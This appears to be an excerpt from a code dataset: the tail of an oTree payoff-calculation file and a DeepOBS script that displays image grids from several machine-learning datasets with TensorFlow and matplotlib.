part.vars.get('exp2_pay_ecu', 0),\n 'exp2_pay_eur': round(part.vars.get('exp2_pay_ecu', 0) / 10, 2),\n 'rounded_payoff': round_up_to_next_20_cents(part.payoff/10 + player.session.config['participation_fee'])\n }\n\npage_sequence = [Demographics, Payoff]\n","repo_name":"chkgk/msc_combined_lab","sub_path":"Demographics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21155461339","text":"# -*- coding: utf-8 -*-\n\"\"\"Script to visualize images from DeepOBS datasets.\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nfrom deepobs.tensorflow import datasets\nimport deepobs.tensorflow.config as config\n\n\ndef denormalize_image(img):\n \"\"\"Convert a normalized (float) image back to unsigned 8-bit images.\"\"\"\n img -= np.min(img)\n img /= np.max(img)\n img *= 255.0\n return np.round(img).astype(np.uint8)\n\n\ndef display_images(dataset_cls, grid_size=5, phase=\"train\"):\n \"\"\"Display images from a DeepOBS data set.\n\n Args:\n dataset_cls: The DeepOBS dataset class to display images from. Is assumed to\n yield a tuple (x, y) of images and one-hot label vectors.\n grid_size (int): Will display grid_size**2 number of images.\n phase (str): Images from this phase ('train', 'train_eval', 'test') will be\n displayed.\n \"\"\"\n tf.reset_default_graph()\n dataset = dataset_cls(batch_size=grid_size * grid_size)\n x, y = dataset.batch\n if phase == \"train\":\n init_op = dataset.train_init_op\n elif phase == \"train_eval\":\n init_op = dataset.train_eval_init_op\n elif phase == \"test\":\n init_op = dataset.test_init_op\n else:\n raise ValueError(\n \"Choose 'phase' from ['train', 'train_eval', 'test'].\")\n with tf.Session() as sess:\n sess.run(init_op)\n x_, y_ = sess.run([x, y])\n label_dict = load_label_dict(dataset_cls.__name__)\n fig = plt.figure()\n for i in range(grid_size * grid_size):\n axis = fig.add_subplot(grid_size, grid_size, i + 1)\n img = np.squeeze(denormalize_image(x_[i]))\n axis.imshow(img)\n # axis.set_title(\"Label {0:d}\".format(np.argmax(y_[i])))\n axis.set_title(label_dict[np.argmax(y_[i])])\n axis.axis(\"off\")\n fig.tight_layout(pad=0, w_pad=0, h_pad=0)\n fig.suptitle(dataset_cls.__name__ + \" (\" + phase + \")\")\n fig.show()\n\n\ndef load_label_dict(dataset):\n \"\"\"Get dict that translates from label number to humanly-readable class\n (e.g. from 1 -> automobile on cifar 10)\n\n Args:\n dataset (str): Name of the dataset.\n\n Returns:\n dict: Dictionary that translates from class number to class label.\n\n \"\"\"\n if dataset == \"cifar10\":\n with open(\n os.path.join(config.get_data_dir(),\n \"cifar-10/batches.meta.txt\")) as lookup_file:\n label_dict = lookup_file.readlines()\n elif dataset == \"cifar100\":\n with open(\n os.path.join(config.get_data_dir(),\n \"cifar-100/fine_label_names.txt\")) as lookup_file:\n label_dict = lookup_file.readlines()\n elif dataset == \"fmnist\":\n label_dict = dict([(0, \"T-shirt\"), (1, \"Trouser\"), (2, \"Pullover\"),\n (3, \"Dress\"), (4, \"Coat\"), (5, \"Sandal\"),\n (6, \"Shirt\"), (7, \"Sneaker\"), (8, \"Bag\"),\n (9, \"Ankle boot\")])\n elif dataset == \"imagenet\":\n label_file = os.path.join(\n os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__))),\n \"imagenet_labels.txt\")\n # Read from text file\n label_dict = {}\n i = 0\n with open(label_file) as f:\n for line in f:\n label_dict[i] = line.rstrip()\n i += 1\n else:\n label_dict = IdentityDict()\n return label_dict\n\n\nclass IdentityDict(dict):\n \"\"\"An identity dictionary, return the key as value.\"\"\"\n\n def __missing__(self, key):\n return key\n\n\nif __name__ == \"__main__\":\n display_images(datasets.mnist, grid_size=5, phase=\"train\")\n display_images(datasets.mnist, grid_size=5, phase=\"train_eval\")\n display_images(datasets.mnist, grid_size=5, phase=\"test\")\n\n display_images(datasets.fmnist, grid_size=5, phase=\"train\")\n display_images(datasets.fmnist, grid_size=5, phase=\"train_eval\")\n display_images(datasets.fmnist, grid_size=5, phase=\"test\")\n\n display_images(datasets.cifar10, grid_size=5, phase=\"train\")\n display_images(datasets.cifar10, grid_size=5, phase=\"train_eval\")\n display_images(datasets.cifar10, grid_size=5, phase=\"test\")\n\n display_images(datasets.cifar100, grid_size=5, phase=\"train\")\n display_images(datasets.cifar100, grid_size=5, phase=\"train_eval\")\n display_images(datasets.cifar100, grid_size=5, phase=\"test\")\n\n display_images(datasets.svhn, grid_size=5, phase=\"train\")\n display_images(datasets.svhn, grid_size=5, phase=\"train_eval\")\n display_images(datasets.svhn, grid_size=5, phase=\"test\")\n\n display_images(datasets.imagenet, grid_size=5, phase=\"train\")\n display_images(datasets.imagenet, grid_size=5, phase=\"train_eval\")\n display_images(datasets.imagenet, grid_size=5, phase=\"test\")\n\n plt.show()\n","repo_name":"fsschneider/DeepOBS","sub_path":"tests/datasets/display_image_datasets.py","file_name":"display_image_datasets.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"79"}